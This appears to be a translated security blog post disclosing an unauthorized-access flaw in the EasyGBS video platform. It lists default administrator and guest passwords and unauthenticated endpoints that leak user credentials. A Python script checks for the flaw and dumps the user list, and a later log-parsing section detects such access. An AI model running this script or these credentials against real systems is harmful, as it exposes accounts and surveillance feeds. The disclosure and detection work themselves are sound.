EasyGBS Unauthorized Access Vulnerability

Author: Internet

I. Vulnerability details

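EasyGBS is a national-standard (GB) video cloud platform developed by TSINGSEE. Versions of the platform up to and including 1.4.9 have an unauthorized access vulnerability: an attacker can open the platform's API documentation directly, without authenticating, and thereby learn the system's API endpoints, which results in information disclosure.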

II. Affected versions

EasyGBS <= 1.4.9

III. Exploitation

1. Default credentials:

easygbs/easygbs  #  administrator privileges
guest2020/guest2014&2020  #  guest privileges

2. API documentation: /apidoc/#api-device

3. Disclosure of user account and password information: /api/v1/userlist?pageindex=0&pagesize=10

4. Logging in to the video surveillance system with the leaked user information:

5. PoC detection script

import requests
from bs4 import BeautifulSoup
import sys

def check_poc(result):
    # The API documentation page is recognised by its <div class="spinner"> element
    bf = BeautifulSoup(result.text, 'lxml')
    return bool(bf.find_all('div', class_='spinner'))

def check_exp(result):
    # The user list response carries a "UserList" key
    return "UserList" in result.text

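class Scan():
    def poc(self, url):
        # Check whether the API documentation is served without authentication
        payload_1 = r'/apidoc/#api-device'
        headers = {
            'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            # A timeout keeps the check from hanging on an unresponsive host
            result = requests.get(url + payload_1, headers=headers, timeout=10)
            if result.status_code == 200 and check_poc(result):
                return {
                    0: "[+] 存在EasyGBS未授权访问漏洞!",  # vulnerable
                    1: "API文档地址:{}".format(url + payload_1),  # API documentation URL
                }
            else:
                return {0: "[-] 不存在EasyGBS未授权访问漏洞!"}  # not vulnerable
        except requests.RequestException:
            return {0: "[-] 可能不存在EasyGBS未授权访问漏洞!"}  # request failed, probably not vulnerable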

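    def exp(self, url):
        # Request the user list endpoint without any session or token
        payload_2 = r'/api/v1/userlist?pageindex=0&pagesize=10'
        headers = {
            'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            result = requests.get(url + payload_2, headers=headers, timeout=10)
            if result.status_code == 200 and check_exp(result):
                info = result.json()['UserList']
                # Return [index, entry] pairs so the caller can build a dict from them
                return [[i, entry] for i, entry in enumerate(info)]
            else:
                return {0: "[-] 获取用户信息失败!"}  # failed to get user information
        except (requests.RequestException, ValueError, KeyError):
            # Network error, non-JSON body, or no top-level "UserList" key
            return {0: "[-] 可能获取用户信息失败!"}  # probably failed to get user information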

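if __name__ == "__main__":
    # Usage: <script> <base_url> <poc|exp>
    if len(sys.argv) != 3:
        sys.exit("usage: {} <url> <poc|exp>".format(sys.argv[0]))
    url = sys.argv[1].rstrip('/')
    mode = sys.argv[2]
    scan = Scan()
    if mode == 'poc':
        result = scan.poc(url)
    else:
        result = scan.exp(url)
    print(dict(result))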
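
On the defensive side, successful requests to the two endpoints above show up in web access logs. The following is an added example, not part of the original post or of EasyGBS: it assumes a reverse proxy in front of the platform that writes nginx/Apache combined-format logs, and the sample lines, the `admin_sources` allowlist and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Endpoints named in this write-up; a 2xx answer to either one is the signal.
SENSITIVE_PREFIXES = ("/apidoc", "/api/v1/userlist")

# Assumption: a reverse proxy writes nginx/Apache "combined" access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jun/2021:10:00:01 +0800] "GET /apidoc/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Jun/2021:10:00:05 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 200 843 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [02/Jun/2021:10:01:00 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 401 0 "-" "curl/7.68.0"',
    '192.0.2.10 - - [02/Jun/2021:10:02:00 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 200 843 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [02/Jun/2021:10:03:00 +0800] "GET /apidoc/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'truncated line',
]

def find_exposure_hits(lines, admin_sources=frozenset()):
    """Map client IP -> [(timestamp, path, status)] for successful requests
    to the API docs or user list from sources outside admin_sources."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["ip"] in admin_sources:
            continue  # malformed line or expected administrator traffic
        path = m["target"].split("?", 1)[0].lower()  # drop the query string
        if path.startswith(SENSITIVE_PREFIXES) and m["status"].startswith("2"):
            hits[m["ip"]].append((m["ts"], path, int(m["status"])))
    return dict(hits)

def userlist_readers(hits):
    """Clients that got the user list back: treat every listed account as exposed."""
    return sorted(ip for ip, events in hits.items()
                  if any(p.startswith("/api/v1/userlist") for _, p, _ in events))

if __name__ == "__main__":
    hits = find_exposure_hits(SAMPLE_LOG, admin_sources={"192.0.2.10"})
    for ip, events in hits.items():
        print(ip, events)
    print("user list retrieved by:", userlist_readers(hits))
```

Any address reported by `userlist_readers` received account data, so those credentials should be rotated along with the default ones listed in step 1.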

 

Source: https://blog.csdn.net/qq_41832837/article/details/117476973